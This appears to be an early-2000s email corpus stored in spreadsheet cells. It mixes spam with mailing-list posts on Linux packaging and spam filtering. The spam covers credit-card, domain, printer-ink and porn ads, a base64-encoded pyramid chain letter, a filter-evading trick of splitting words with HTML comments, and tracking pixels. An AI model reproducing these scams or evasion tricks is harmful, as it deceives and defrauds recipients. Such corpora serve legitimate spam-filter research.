 &lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYrd8cbl-pEvKY-qkCKnR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e433&amp;ISSUE=2002-07-16" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=27-z9PmnOI34RnMMcu2DC9pyE4-j9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: want to accept credit cards? 126432211
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 A&lt;!--mom and dad--&gt;ccept C&lt;!--grandma and grandpa--&gt;redit C&lt;!--aunt kate--&gt;ards - Everyone A&lt;!--uncle don--&gt;pproved&lt;p&gt;
 NO C&lt;!--hi family--&gt;REDIT CH&lt;!--i love you all--&gt;ECKS
 &lt;p&gt;
 &lt;a href=http://www.requestedinfo.net/cgi-bin/rbis.cgi?code=btbtb2&gt;DO IT NOW&lt;/a&gt;
 &lt;p&gt;
 &lt;/html&gt;
 126432211
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: .BIZ  .INFO domain extensions
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Attention:  Internet Domain Registrant
 The new top level domain names with extensions .BIZ, .INFO, .PRO, 
 and .NAME have just been approved by global internet authorities 
 and will be released soon, but don't wait until then to register.  
 These domains are available NOW for pre-registration at:
 http://www.RegisterNewExtensions.net on a first come, first serve 
 basis.
 "While .com names hold the most prestige, the next frontier is
 the new suffixes -.info, .biz, and .pro -likely to become available
 later this year..."
 -BUSINESS WEEK MAGAZINE, April 16, 2001.
 It is expected that over 3 million of these new domain names will be
 registered in the first few minutes when registration officially opens
 later this year. If your domain name is important to you, be prepared 
 and pre-register now. Protect your domain name from cybersquatters and 
 speculators. We have the premier pre-registration engine to help you 
 to secure the domain you want.  Over 250,000 names have already been 
 queued into our list and good names are going fast.  Do not wait until 
 the last minute.  Go to http://www.RegisterNewExtensions.net now to 
 pre-register.
 #######################################################################
 This message is sent in compliance with the new email bill section 301.
 Per Section  301, Paragraph (a)(2)(C) of S. 1618 and is not intended 
 for residents in the State of WA, NV, CA &amp; VA. If you have received 
 this mailing in error, or do not wish to receive any further mailings 
 pertaining to this topic, simply send email to: del_list_tld@yahoo.com.
 We respect all removal requests.
 #######################################################################
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Printer needs Ink
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Untitled Document&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;table width="291" border="2" cellspacing="0" cellpadding="5" bordercolor="#000000" align="center"&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;table width="500" border="0" cellspacing="0" cellpadding="4"&gt;
 &lt;tr&gt;
 &lt;td colspan="2"&gt;&lt;a href="http://www.totalglobe.net/inks/cgi-bin/sub.cgi?name=jm@netnoteinc.com"&gt;&lt;img src="http://www.totalglobe.net/inks/buy3.gif" width="500" height="43" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;
 &lt;td colspan="2"&gt;&lt;a href="http://www.totalglobe.net/inks/cgi-bin/sub.cgi?name=jm@netnoteinc.com"&gt;&lt;img src="http://www.totalglobe.net/inks/save.gif" width="500" height="42" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;
 &lt;td valign="top"&gt;&lt;a href="http://www.totalglobe.net/inks/cgi-bin/sub.cgi?name=jm@netnoteinc.com"&gt;&lt;img src="http://www.totalglobe.net/inks/leftnav.gif" width="179" height="347" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="300" valign="top"&gt;
 &lt;p align="left"&gt;&lt;font face="Arial" size="2"&gt;&lt;b&gt;&lt;font color="#000000" size="3"&gt;This is what are customers are saying&lt;br&gt;
 &lt;img src="http://www.saveoninks.com/images/email/opens.gif" width="1" height="1"&gt;&lt;br&gt;
 &lt;a href="http://www.totalglobe.net/inks/cgi-bin/sub.cgi?name=jm@netnoteinc.com"&gt;&lt;img src="http://www.totalglobe.net/inks/satisfaction.gif" width="109" height="109" align="right" border="0"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Arial"&gt;&lt;i&gt;&lt;font size="2"&gt;&amp;#147;I was shocked. I can't believe how low the prices are, and the quality of the product is great. I will recommend your site  to everyone I know.&amp;#148; &lt;br&gt;
 ----------------------------------------------&lt;br&gt;
 &lt;a href="http://www.totalglobe.net/inks/cgi-bin/sub.cgi?name=jm@netnoteinc.com"&gt;&lt;img src="http://www.totalglobe.net/inks/harvester_cust1.jpg" width="57" height="62" align="left" border="0"&gt;&lt;/a&gt;&amp;quot;
 Cartridges were half of my lowest discount store prices. Delivery was in about 3-5  days.
 Cartridges work perfectly, so far. I will definitely order again&amp;#148;   
 &lt;/font&gt;&lt;font face="Arial"&gt;&lt;i&gt;&lt;font size="2"&gt;&lt;br&gt;
 ------------------------------------------------------------&lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;font size="2"&gt;&lt;br&gt;
 &amp;#147;The Product is excellent. Ink refill kits, easy to use and saving is substantial!&amp;#148;  &amp;#147;My order came within three days - much faster than I expected. Definite savings over staples.&lt;/font&gt;&lt;font face="Arial" size="2"&gt;&amp;quot;&lt;/font&gt;&lt;font size="2"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font face="Arial"&gt;&lt;i&gt;&lt;font size="2"&gt;------------------------------------------------------------&lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;br&gt;
 &lt;font size="2"&gt;&lt;a href="http://www.totalglobe.net/inks/cgi-bin/sub.cgi?name=jm@netnoteinc.com"&gt;&lt;img src="http://www.totalglobe.net/inks/harvester_cust2.jpg" width="56" height="65" align="left" border="0"&gt;&lt;/a&gt;&amp;quot;Cheaper than any place else in town. Why buy new cartridges when you can get perfectly good results with refills for about 20% of original cost.&amp;#148;  &lt;br&gt;
 &lt;b&gt;&lt;font size="4"&gt;Savings are real.&lt;/font&gt; &lt;/b&gt;&lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;i&gt;&lt;br&gt;
 &lt;img src="http://www.totalglobe.net/inks/spacer.gif" width="320" height="1"&gt;&lt;br&gt;
 &lt;/i&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;a href="http://www.totalglobe.net/inks/cgi-bin/sub.cgi?name=jm@netnoteinc.com"&gt;&lt;font face="Arial"&gt;CLICK HERE&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;
 &lt;td&gt;&lt;font face="Arial" size="2"&gt;
 To be removed from our mailing list click on the link below  and you will be removed from future mailings &lt;a href="http://www.totalglobe.net/inks/cgi-bin/remove.cgi?name=jm@netnoteinc.com"&gt;click here&lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DVD+RW tools available (Was: Re: How to add service port ?)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-08-12 at 06:32, Matthias Saou wrote:
 &gt; Once upon a time, Yen wrote :
 &gt; 
 &gt; &gt; How do I install / add an additional service port to the system which
 &gt; &gt; can be access via Microsoft ODBC driver?
 &gt; 
 &gt; I honestly have no idea, and this is probably not the best list to expect
 &gt; an answer as it is supposed to discuss rpm packages/packaging matters.
 &gt; 
 &gt; If you're using Red Hat Linux 7.3, you should try this list :
 &gt; https://listman.redhat.com/mailman/listinfo/valhalla-list
 I had to take a stab at answering that for a paying customer yesterday.
 I _think_ you need to install postgreql-odbc and its' dependencies. Then
 probably a bit of configuration to open a port to the network. But
 Matthias is right, this is not the right place for this question.
 To bring things back on topic, I was practicing my "rpmbuild'n skillz"
 and made an rpm with some simple software tools to drive my DVD+RW
 burner. No GUI frontend, but it works just fine from the command line. I
 even used it to burn a bootable DVD version of Red Hat 7.3.
 ftp://people.redhat.com/ckloiber/dvd+rw-tools-0.1.src.rpm
 -- 
 Chris Kloiber
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; Wrong, [VMS-like async io] makes a huge difference in even what I
 &gt; consider small programs.
 So it sounds as if, to your thinking,
 most useful apps are also trivial. 
 Unless each key on my keyboard were
 (to the apps) distinct event sources,
 I can't think of any of my usual job
 mix that would need hundreds, or even
 tens, of async requests; perhaps you
 can explain how nontrivial apps will
 be compellingly useful? 
 &gt; but it's still not built in, who knows when it will be. The point is it's
 &gt; not portable in either case.
 Does that lack of portability imply it
 isn't generally useful?  (When it was
 apparent that TCP networks were useful,
 berkeley sockets could be found even
 on VMS and Win 3.1 boxen)
 Why would early Unix have run with the
 idea that, if one wishes to do multiple
 things at the same time, one can use a
 group of processes to do them?
 - they had Multics as a counterexample?
 - in the days of tiny memories and tapes,
   people were more accustomed to writing
   programs that didn't run entirely in a
   single address space?
 - one is a great number for an interface,
   as log(1) is 0, and specification can
   be implicit?
 - some combination of the above?
 Now, as Hoare says:
 &gt; There are two ways of constructing a software design.  One way is to make
 &gt; it so simple that there are obviously no deficiencies and the other is to
 &gt; make it so complicated that there are no obvious deficiencies.
 As programmers, we've been able to make
 our lives complicated for at least half
 a century; the hardware interrupt gives
 us the rope.
 Part of Dijkstra's inspiration for THE
 was the counterexample of IBM's multi-
 programmed boxes (were these the same
 ones that inspired Mythical Man Month?)
 and I suppose he would say the question
 is how not to make a mess of it -- how
 should we structure computations so if
 we try to do ten times as many things
 at the same time, reasoning about the
 resulting system is at most ten times
 more complex -- not one hundred, and
 certainly not three and a half million
 times more.
 Compared to that project, the prospect
 of writing a driver library for various
 vendors' aio implementations seems to
 be truly trivial.
 -Dave
 (Oracle, in their quest for portability,
 used to use raw disks for the database.
 This finessed the filesystem issue; did
 it also allow them to roll their own set
 of async drivers?)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] In case anyone forgot
</t>
  </si>
  <si>
    <t xml:space="preserve">
 http://www.sysadminday.com/
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">IMPORTANT INFORMATION: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http://www.affordable-domains.com today for more info.
 Register your domain name today for just $14.95 at: http://www.affordable-domains.com. Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.
 Sincerely,
 Domain Administrator
 Affordable Domains
 To remove your email address from further promotional mailings from this company, click here:
 http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
 9358vISa9-l9
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] SA In The News
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 20 Aug 2002, Matthew Cline wrote:
 &gt; On Tuesday 20 August 2002 07:57 pm, Harold Hallikainen wrote:
 &gt; &gt; http://www.wired.com/news/technology/0,1282,54645,00.html
 &gt; 
 &gt; Summary: a company will offer short snippets of original, copyrighted
 &gt; and trademarked text that can be inserted into email message headers,
 &gt; and email filters can recognize this as a "not-spam" indicator.  Any
 &gt; spammers who use the text will be sued for copyright and trademark
 &gt; infringement.
 They may be in for a patent fight before any of this goes forward:
 http://www.eweek.com/article2/0,3959,476558,00.asp
 "Banking on the fact that few enterprises sending commercial mail want to 
 be associated with spam, IronPort Systems Inc., in San Bruno, Calif., has 
 developed the Bonded Sender program in an effort to give legitimate bulk 
 e-mailers some credibility."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</si>
  <si>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Want to watch HARDCORE PORN MOVIES ? 
 Our site is voted the #1 BROADBAND MOVIE SITE ONLINE !
 Click this link to WATCH OUR STEAMING CHIX IN ACTION :
 http://www.froggyhost.com/clubs/sexmoviestoday/
 To unsubscribe from our list enter you email here :
 http://www.froggyhost.com/clubs/remove/ 
  [JK9^":}H&amp;*TG0BK5NKIYs5]
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Razor report don't seem to be getting logged
</t>
  </si>
  <si>
    <t xml:space="preserve">For the past 2 days, nothing that I'm reporting seems to be in the
 database.  If I report something, and the check the response is coming
 back as none spam.  Is anyone else seeing this?
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: DANIEL  KARGBO. fork !
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Wow, what a flash, I just got the _perfect_ idea for a new
 suspense/crime TV drama: Every week, some poor schmuck answers 
 one of these Nigerian Scams ...
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ville wrote :
 &gt; I assume that you won't %ghost or remove these and the modules.conf
 &gt; change on uninstall, though.  So people who are installing this RPM and
 &gt; are unfortunate enough to have a DVD drive (or just an ordinary CD,
 &gt; non-DVD drive) that doesn't support DMA will be left with a system
 &gt; without a working CD drive, even after removing the RPM.  And without
 &gt; ever knowing what struck them.  You can't remove the DMA setting from
 &gt; modules.conf either unless you're sure that ogle added it there and
 &gt; nothing else needs it.
 I've never heard of any CD-ROM or DVD-ROM drive having problems with DMA...
 although there probably is since Red Hat decided to default disabling it a
 few releases back :-/
 Normally, even if you try to enable DMA and your device doesn't support it,
 it simply don't be able to make the change, and that's it. The problem IIRC
 is with crappy hardware that is supposed to support DMA but doesn't work as
 expected when it's enabled... maybe Chris could confirm this? ;-)
 I guess I'll settle for the /dev/dvd link change as described and putting
 the DMA tip in the %description :-)
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.00 0.05 0.14
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ru stupid
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000185.html
 Date: 2002-09-19T22:30:15-08:00
 Dan thinks it is evolution. To me it's stupidity, laziness, and apathy. I have 
 to respectfully disagree. Or maybe I'm just being stubborn. For whatever 
 reason, whenever I get e-mail from someone who: Writes "ur" instead of "you 
 are" or...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Conference calls/best quality/$.18 per minute!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A little Investment, Will  make you plenty 92-2
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00C5_18C07A8D.E1271B68
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 RGVhciBGdXR1cmUgTWlsbGlvbmFpcmU6DQoNCkknbGwgbWFrZSB5b3UgYSBw
 cm9taXNlLiBSRUFEIFRISVMgRS1NQUlMIFRPIFRIRSBFTkQhIC0gRm9sbG93
 DQp3aGF0IGl0IHNheXMgdG8gdGhlIGxldHRlciAtIGFuZCB5b3Ugd2lsbCBu
 b3Qgd29ycnkgd2hldGhlciBhDQpSRUNFU1NJT04gaXMgY29taW5nIG9yIG5v
 dCwgd2hvIGlzIFByZXNpZGVudCwgb3Igd2hldGhlciB5b3Uga2VlcA0KeW91
 ciBjdXJyZW50IGpvYiBvciBub3QuIFllcywgSSBrbm93IHdoYXQgeW91IGFy
 ZSB0aGlua2luZy4gSQ0KbmV2ZXIgcmVzcG9uZGVkIHRvIG9uZSBvZiB0aGVz
 ZSBiZWZvcmUgZWl0aGVyLiBPbmUgZGF5IHRob3VnaCwNCnNvbWV0aGluZyBq
 dXN0IHNhaWQgInlvdSB0aHJvdyBhd2F5ICQyNS4wMCBnb2luZyB0byBhIG1v
 dmllIGZvciAyDQpob3VycyB3aXRoIHlvdXIgd2lmZSIuICJXaGF0IHRoZSBo
 ZWNrLiIgQmVsaWV2ZSBtZSwgbm8gbWF0dGVyDQp3aGVyZSB5b3UgYmVsaWV2
 ZSAidGhvc2UgZmVlbGluZ3MiIGNvbWUgZnJvbSwgSSB0aGFuayBnb29kbmVz
 cw0KZXZlcnkgZGF5IHRoYXQgSSBoYWQgdGhhdCBmZWVsaW5nLiBJIGNhbm5v
 dCBpbWFnaW5lIHdoZXJlIEkgd291bGQNCmJlIG9yIHdoYXQgSSB3b3VsZCBi
 ZSBkb2luZyBoYWQgSSBub3QuIFJlYWQgb24uICBJdCdzIHRydWUuIEV2ZXJ5
 DQp3b3JkIG9mIGl0LiBJdCBpcyBsZWdhbC4gSSBjaGVja2VkLiBTaW1wbHkg
 YmVjYXVzZSB5b3UgYXJlIGJ1eWluZw0KYW5kIHNlbGxpbmcgc29tZXRoaW5n
 IG9mIHZhbHVlLg0KDQpBUyBTRUVOIE9OIE5BVElPTkFMIFRWOg0KDQpNYWtp
 bmcgb3ZlciBoYWxmIG1pbGxpb24gZG9sbGFycyBldmVyeSA0IHRvIDUgbW9u
 dGhzIGZyb20geW91cg0KaG9tZS4NCg0KVEhBTksnUyBUTyBUSEUgQ09NUFVU
 RVIgQUdFIEFORCBUSEUgSU5URVJORVQgIQ0KPT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCkJFIEFOIElOVEVS
 TkVUIE1JTExJT05BSVJFIExJS0UgT1RIRVJTIFdJVEhJTiBBIFlFQVIhISEN
 Cg0KQmVmb3JlIHlvdSBzYXkgJydCdWxsJycsIHBsZWFzZSByZWFkIHRoZSBm
 b2xsb3dpbmcuIFRoaXMgaXMgdGhlDQpsZXR0ZXIgeW91IGhhdmUgYmVlbiBo
 ZWFyaW5nIGFib3V0IG9uIHRoZSBuZXdzIGxhdGVseS4gRHVlIHRvIHRoZQ0K
 cG9wdWxhcml0eSBvZiB0aGlzIGxldHRlciBvbiB0aGUgSW50ZXJuZXQsIGEg
 bmF0aW9uYWwgd2Vla2x5IG5ld3MNCnByb2dyYW0gcmVjZW50bHkgZGV2b3Rl
 ZCBlbnRpcmUgc2hvdyB0byB0aGUgaW52ZXN0aWdhdGlvbiBvZiB0aGlzDQpw
 cm9ncmFtIGRlc2NyaWJlZCBiZWxvdywgdG8gc2VlIGlmIGl0IHJlYWxseSBj
 YW4gbWFrZSBwZW9wbGUNCm1vbmV5LiBUaGUgc2hvdyBhbHNvIGludmVzdGln
 YXRlZCB3aGV0aGVyIG9yIG5vdCB0aGUgcHJvZ3JhbSB3YXMNCmxlZ2FsLg0K
 DQpUaGVpciBmaW5kaW5ncyBwcm92ZWQgb25jZSBhbmQgZm9yIGFsbCB0aGF0
 IHRoZXJlIGFyZQ0KJydhYnNvbHV0ZWx5IE5PIExhd3MgcHJvaGliaXRpbmcg
 dGhlIHBhcnRpY2lwYXRpb24gaW4gdGhlIHByb2dyYW0NCmFuZCBpZiBwZW9w
 bGUgY2FuICJmb2xsb3cgdGhlIHNpbXBsZSBpbnN0cnVjdGlvbiIgdGhleSBh
 cmUgYm91bmQNCnRvIG1ha2Ugc29tZSBtZWdhIGJ1Y2tzIHdpdGggb25seSAk
 MjUgb3V0IG9mIHBvY2tldCBjb3N0JycuIERVRQ0KVE8gVEhFIFJFQ0VOVCBJ
 TkNSRUFTRSBPRiBQT1BVTEFSSVRZICYgUkVTUEVDVCBUSElTDQpQUk9HUkFN
 IEhBUyBBVFRBSU5FRCwgSVQgSVMgQ1VSUkVOVExZICAgV09SS0lORyBCRVRU
 RVIgVEhBTiBFVkVSLg0KVGhpcyBpcyB3aGF0IG9uZSBoYWQgdG8gc2F5OiAn
 JyBUaGFua3MgdG8gdGhpcyBwcm9maXRhYmxlDQpvcHBvcnR1bml0eSIuIEkg
 d2FzIGFwcHJvYWNoZWQgbWFueSB0aW1lcyBiZWZvcmUgYnV0IGVhY2ggdGlt
 ZSBJDQpwYXNzZWQgb24gaXQuIEkgYW0gc28gZ2xhZCBJIGZpbmFsbHkgam9p
 bmVkIGp1c3QgdG8gc2VlIHdoYXQgb25lDQpjb3VsZCBleHBlY3QgaW4gcmV0
 dXJuIGZvciB0aGUgbWluaW1hbCBlZmZvcnQgYW5kIG1vbmV5IHJlcXVpcmVk
 Lg0KVG8gbXkgYXN0b25pc2htZW50LCBJIHJlY2VpdmVkIGEgdG90YWwgJCA2
 MTAsNDcwLjAwIGluIDIxIHdlZWtzLA0Kd2l0aCBtb25leSBzdGlsbCBjb21p
 bmcgaW4nJy4gUGFtIEhlZGxhbmQsIEZvcnQgTGVlLCBOZXcgSmVyc2V5Lg0K
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT0NCkFub3RoZXIgc2FpZDogInRoaXMgcHJvZ3JhbSBoYXMgYmVlbiBh
 cm91bmQgZm9yIGEgbG9uZyB0aW1lIGJ1dCBJDQpuZXZlciBiZWxpZXZlZCBp
 biBpdC4gQnV0IG9uZSBkYXkgd2hlbiBJIHJlY2VpdmVkIHRoaXMgYWdhaW4g
 aW4NCnRoZSBtYWlsIEkgZGVjaWRlZCB0byBnYW1ibGUgbXkgJDI1IG9uIGl0
 LiBJIGZvbGxvd2VkIHRoZSBzaW1wbGUNCmluc3RydWN0aW9ucyBhbmQgd2Fs
 YWEgLi4uLi4gMyB3ZWVrcyBsYXRlciB0aGUgbW9uZXkgc3RhcnRlZCB0bw0K
 Y29tZSBpbi4gRmlyc3QgbW9udGggSSBvbmx5IG1hZGUgJDI0MC4wMCBidXQg
 dGhlIG5leHQgMiBtb250aHMNCmFmdGVyIHRoYXQgSSBtYWRlIGEgdG90YWwg
 b2YgJDI5MCwwMDAuMDAuIFNvIGZhciwgaW4gdGhlIHBhc3QgOA0KbW9udGhz
 IGJ5IHJlLWVudGVyaW5nIHRoZSBwcm9ncmFtLCBJIGhhdmUgbWFkZSBvdmVy
 ICQ3MTAsMDAwLjAwDQphbmQgSSBhbSBwbGF5aW5nIGl0IGFnYWluLiBUaGUg
 a2V5IHRvIHN1Y2Nlc3MgaW4gdGhpcyBwcm9ncmFtIGlzDQp0byBmb2xsb3cg
 dGhlIHNpbXBsZSBzdGVwcyBhbmQgTk9UIGNoYW5nZSBhbnl0aGluZy4nJyBN
 b3JlDQp0ZXN0aW1vbmlhbHMgbGF0ZXIgYnV0IGZpcnN0Og0KDQoNCj09PT09
 PT09PT09IFBSSU5UIFRISVMgTk9XIEZPUiBZT1VSIEZVVFVSRSBSRUZFUkVO
 Q0UgPT09PQ0KDQokJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
 JCQkJCQkJCQkJCQkJCQkJCQkJCQkJA0KDQpJZiB5b3Ugd291bGQgbGlrZSB0
 byBtYWtlIGF0IGxlYXN0ICQ1MDAsMDAwIGV2ZXJ5IDQgdG8gNSBtb250aHMN
 CmVhc2lseSBhbmQgY29tZm9ydGFibHksIHBsZWFzZSByZWFkIHRoZSBmb2xs
 b3dpbmcuLi5USEVOIFJFQUQgSVQNCkFHQUlOIGFuZCBBR0FJTiAhISENCg0K
 JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
 JCQkJCQkJCQkJCQNCg0KRk9MTE9XIFRIRSBTSU1QTEUgSU5TVFJVQ1RJT04g
 QkVMT1cgQU5EIFlPVVIgRklOQU5DSUFMIERSRUFNUw0KV0lMTCBDT01FIFRS
 VUUsIEdVQVJBTlRFRUQhDQoNCklOU1RSVUNUSU9OUzoNCg0KPT09PT1PcmRl
 ciBhbGwgNSByZXBvcnRzIHNob3duIG9uIHRoZSBsaXN0IGJlbG93ID09PT09
 DQoNCkZvciBlYWNoIHJlcG9ydCwgc2VuZCAkNSBDQVNILCBUSEUgTkFNRSAm
 IE5VTUJFUiBPRiBUSEUgUkVQT1JUDQpZT1UgQVJFIE9SREVSSU5HIGFuZCBZ
 T1VSIEUtTUFJTCBBRERSRVNTIHRvIHRoZSBwZXJzb24gd2hvc2UgbmFtZQ0K
 YXBwZWFycyBPTiBUSEFUIExJU1QgbmV4dCB0byB0aGUgcmVwb3J0LiBNQUtF
 IFNVUkUgWU9VUiBSRVRVUk4NCkFERFJFU1MgSVMgT04gWU9VUiBFTlZFTE9Q
 RSBUT1AgTEVGVCBDT1JORVIgaW4gY2FzZSBvZiBhbnkgbWFpbA0KcHJvYmxl
 bXMuDQoNCj09PVdIRU4gWU9VIFBMQUNFIFlPVVIgT1JERVIsIE1BS0UgU1VS
 RSBZT1UgT1JERVIgRUFDSCBPRiBUSEUgNQ0KUkVQT1JUUyEgPT09DQpZb3Ug
 d2lsbCBuZWVkIGFsbCA1IHJlcG9ydHMgc28gdGhhdCB5b3UgY2FuIHNhdmUg
 dGhlbSBvbiB5b3VyDQpjb21wdXRlciBhbmQgcmVzZWxsIHRoZW0uIFlPVVIg
 VE9UQUwgQ09TVCAkNSBYIDUgPSAkMjUuMDAuDQoNCldpdGhpbiBhIGZldyBk
 YXlzIHlvdSB3aWxsIHJlY2VpdmUsIHZpYSBlLW1haWwsIGVhY2ggb2YgdGhl
 IDUNCnJlcG9ydHMgZnJvbSB0aGVzZSA1IGRpZmZlcmVudCBpbmRpdmlkdWFs
 cy4gU2F2ZSB0aGVtIG9uIHlvdXINCmNvbXB1dGVyIHNvIHRoZXkgd2lsbCBi
 ZSBhY2Nlc3NpYmxlIGZvciB5b3UgdG8gc2VuZCB0byB0aGUNCjEsMDAwJ3Mg
 b2YgcGVvcGxlIHdobyB3aWxsIG9yZGVyIHRoZW0gZnJvbSB5b3UuIEFsc28g
 bWFrZSBhDQpmbG9wcHkgb2YgdGhlc2UgcmVwb3J0cyBhbmQga2VlcCBpdCBv
 biB5b3VyIGRlc2sgaW4gY2FzZQ0Kc29tZXRoaW5nIGhhcHBlbnMgdG8geW91
 ciBjb21wdXRlci4NCg0KSU1QT1JUQU5UIC0gRE8gTk9UIGFsdGVyIHRoZSBu
 YW1lcyBvZiB0aGUgcGVvcGxlIHdobyBhcmUgbGlzdGVkDQpuZXh0IHRvIGVh
 Y2ggcmVwb3J0LCBvciB0aGVpciBzZXF1ZW5jZSBvbiB0aGUgbGlzdCwgaW4g
 YW55IHdheQ0Kb3RoZXIgdGhhbiB3aGF0IGlzIGluc3RydWN0ZWQgYmVsb3cg
 aW4gc3RlcCAnJyAxIHRocm91Z2ggNiAnJyBvcg0KeW91IHdpbGwgbG9vc2Ug
 b3V0IG9uIHRoZSBtYWpvcml0eSBvZiB5b3VyIHByb2ZpdHMuIE9uY2UgeW91
 DQp1bmRlcnN0YW5kIHRoZSB3YXkgdGhpcyB3b3JrcywgeW91IHdpbGwgYWxz
 byBzZWUgaG93IGl0IGRvZXMgbm90DQp3b3JrIGlmIHlvdSBjaGFuZ2UgaXQu
 IFJlbWVtYmVyLCB0aGlzIG1ldGhvZCBoYXMgYmVlbiB0ZXN0ZWQsIGFuZA0K
 aWYgeW91IGFsdGVyIGl0LCBpdCB3aWxsIE5PVCB3b3JrICEhISBQZW9wbGUg
 aGF2ZSB0cmllZCB0byBwdXQNCnRoZWlyIGZyaWVuZHMvcmVsYXRpdmVzIG5h
 bWVzIG9uIGFsbCBmaXZlIHRoaW5raW5nIHRoZXkgY291bGQgZ2V0DQphbGwg
 dGhlIG1vbmV5LiBCdXQgaXQgZG9lcyBub3Qgd29yayB0aGlzIHdheS4gQmVs
 aWV2ZSB1cywgc29tZQ0KaGF2ZSB0cmllZCB0byBiZSBncmVlZHkgYW5kIHRo
 ZW4gbm90aGluZyBoYXBwZW5lZC4gU28gRG8gTm90IHRyeQ0KdG8gY2hhbmdl
 IGFueXRoaW5nIG90aGVyIHRoYW4gd2hhdCBpcyBpbnN0cnVjdGVkLiBCZWNh
 dXNlIGlmIHlvdQ0KZG8sIGl0IHdpbGwgbm90IHdvcmsgZm9yIHlvdS4gUmVt
 ZW1iZXIsIGhvbmVzdHkgcmVhcHMgdGhlDQpyZXdhcmQhISEgVGhpcyBJUyBh
 IGxlZ2l0aW1hdGUgQlVTSU5FU1MuIFlvdSBhcmUgb2ZmZXJpbmcgYQ0KcHJv
 ZHVjdCBmb3Igc2FsZSBhbmQgZ2V0dGluZyBwYWlkIGZvciBpdC4gVHJlYXQg
 aXQgYXMgc3VjaCBhbmQNCnlvdSB3aWxsIGJlIFZFUlkgcHJvZml0YWJsZSBp
 biBhIHNob3J0IHBlcmlvZCBvZiB0aW1lLg0KDQoxLiBBZnRlciB5b3UgaGF2
